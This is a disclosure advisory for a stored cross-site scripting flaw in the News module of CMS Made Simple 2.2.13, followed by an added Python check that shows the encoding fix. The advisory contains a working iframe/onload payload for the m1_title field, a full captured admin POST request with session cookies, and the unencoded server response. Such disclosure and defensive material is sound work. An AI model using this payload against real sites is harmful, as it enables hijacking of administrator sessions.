Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.13
# Summary:
• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Stored
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software: CMS Made Simple 2.2.13
• Product Version: 2.2.13
• Vulnerability Type: Injection
• Vulnerability : Cross Site Scripting (XSS) Stored
# Description:
CMS Made Simple version 2.2.13 suffers from reflected and persistent (stored)
cross-site scripting and HTML injection vulnerabilities.
Insufficient validation of user input in the authenticated part of the CMS Made
Simple web application exposes the application to persistent cross-site
scripting (XSS) vulnerabilities.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.
When the news item is viewed, e.g. by an administrative user, the
JavaScript code is executed in the browser.
# Steps to Reproduce:
The attacker needs appropriate permissions but does not need to be an Admin
(the Editor or Designer user roles suffice) in order to create News, Content,
Directories, Shortcuts, etc.
The Add News function was found to be vulnerable to stored cross-site
scripting (XSS).
Log in as an Editor > click on 'Content' > click on 'News' > Add/Edit 'News' >
insert the XSS payload into the Title field and click Submit. Now click Edit
again, and you will notice the IFRAME and the XSS payload rendering in the browser.
Vulnerable parameter:
• m1_title
Attack vector:
"";"/><iframe/onload=alert('Title')>//
# HTTP Request:
POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: multipart/form-data; boundary=---------------------------17770739424898
Content-Length: 3445
Origin: http://localhost
Connection: close
Cookie: 6a048a268372a94a595fdec4fbda4134aa83a6e6=e5d7ffe9b2883f3ee16cbcab8b30cb7300acc36d%3A%3AeyJ1aWQiOjIsInVzZXJuYW1lIjoiZ3VyYW1qIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJFdaNzlUc1JiOTI2c2pLbmlndmFlcS5QdGVjRTdFdmg1S0FlNnFQNlBMbXJqSFdIQW92Lk5tIn0%3D; __c=233d48d93b73772c983; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc; CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1
-----------------------------17770739424898
Content-Disposition: form-data; name="mact"
News,m1_,addarticle,0
-----------------------------17770739424898
Content-Disposition: form-data; name="__c"
233d48d93b73772c983
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_submit"
Submit
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_title"
News Module Installed"";"/><iframe/onload=alert('Title')>//
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_category"
1
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_summary"
<p>test</p>
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_content"
<p>test</p>
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_status"
draft
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_news_url"
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_extra"
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Month"
12
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Day"
21
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Year"
2019
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_postdate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_searchable"
1
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Month"
12
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Day"
21
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Year"
2019
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_startdate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Month"
06
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Day"
18
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Year"
2020
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Hour"
19
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Minute"
14
-----------------------------17770739424898
Content-Disposition: form-data; name="m1_enddate_Second"
46
-----------------------------17770739424898
Content-Disposition: form-data; name="preview_template"
24
-----------------------------17770739424898
Content-Disposition: form-data; name="preview_returnid"
-1
-----------------------------17770739424898--
# Snip of HTTP Server response (output not encoded):
class="pageoverflow"><p class="pagetext"><label for="fld1">*Title:</label> <span
class="cms_help" data-cmshelp-key="News__help_article_title"
data-cmshelp-title="Title"><img class="cms_helpicon"
src="http://localhost/cmsms-2.2.13/admin/themes/OneEleven/images/icons/system/info.gif"
alt="Title" /></span></p><p class="pageinput"><input type="text" id="fld1"
name="m1_title" value="News Module
Installed"";"/><iframe/onload=alert('Title')>//" size="80" maxlength="255"
required/></p></div><div class="pageoverflow"><p class="pagetext"><label
for="fld2">*Category:</label> <span class="cms_help"
data-cmshelp-key="News__help_article_category"
data-cmshelp-title="Category"><img class="cms_helpicon"
src="http://localhost/cmsms-2.2.13/admin/themes/OneEleven/images/icons/system/info.gif"
alt="Category" /></span></p><p class="pageinput"><select name="m1_category"
id="fld2"><option value="1" selected="selected">General</option>
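To make the "output not encoded" point concrete, the following added Python example (not CMS Made Simple code) renders the m1_title input the way the response snippet above does, beside an attribute-encoded version, and then parses both fragments the way a browser tokenizer would to check whether the stored title stays inside the value attribute. The template fragment and the title value are constructed from the advisory's request and response; the fix shown is generic attribute-context encoding, the equivalent of PHP's htmlspecialchars with ENT_QUOTES.

```python
import html
from html.parser import HTMLParser

# Constructed sample input: the m1_title value from the advisory's request body.
PAYLOAD_TITLE = "News Module Installed\"\";\"/><iframe/onload=alert('Title')>//"

# Template fragment modelled on the <input> in the advisory's response snippet.
_INPUT_TEMPLATE = ('<input type="text" id="fld1" name="m1_title" value="{value}" '
                   'size="80" maxlength="255" required/>')


def render_title_vulnerable(title):
    """Interpolates the stored title into the attribute with no encoding,
    reproducing the 'output not encoded' behaviour the advisory describes."""
    return _INPUT_TEMPLATE.format(value=title)


def render_title_fixed(title):
    """Same fragment with attribute-context encoding. html.escape(quote=True)
    encodes & < > " and ', the equivalent of PHP's
    htmlspecialchars($title, ENT_QUOTES, 'UTF-8') in the template."""
    return _INPUT_TEMPLATE.format(value=html.escape(title, quote=True))


class _StartTagCollector(HTMLParser):
    """Records every start tag as the tolerant tokenizer sees it."""

    def __init__(self):
        super().__init__()
        self.tags = []  # list of (tag name, attribute dict)

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def audit_title_field(fragment, expected_title):
    """Parses a rendered fragment and reports (a) whether the m1_title value
    survives intact inside its attribute and (b) which extra tags were created.
    A correct template yields (True, []); the unencoded one yields an iframe."""
    parser = _StartTagCollector()
    parser.feed(fragment)
    parser.close()
    title_inputs = [a for t, a in parser.tags if t == "input" and a.get("name") == "m1_title"]
    round_trips = bool(title_inputs) and title_inputs[0].get("value") == expected_title
    injected = [t for t, _ in parser.tags if t != "input"]
    return round_trips, injected


if __name__ == "__main__":
    for label, render in (("vulnerable", render_title_vulnerable), ("fixed", render_title_fixed)):
        ok, extra = audit_title_field(render(PAYLOAD_TITLE), PAYLOAD_TITLE)
        print(f"{label}: value intact={ok}, injected tags={extra}")
```

The same audit can be run over a captured admin response: if the parsed value attribute does not equal the title that was submitted, or any tag other than the expected input appears, the template is emitting user input without attribute encoding.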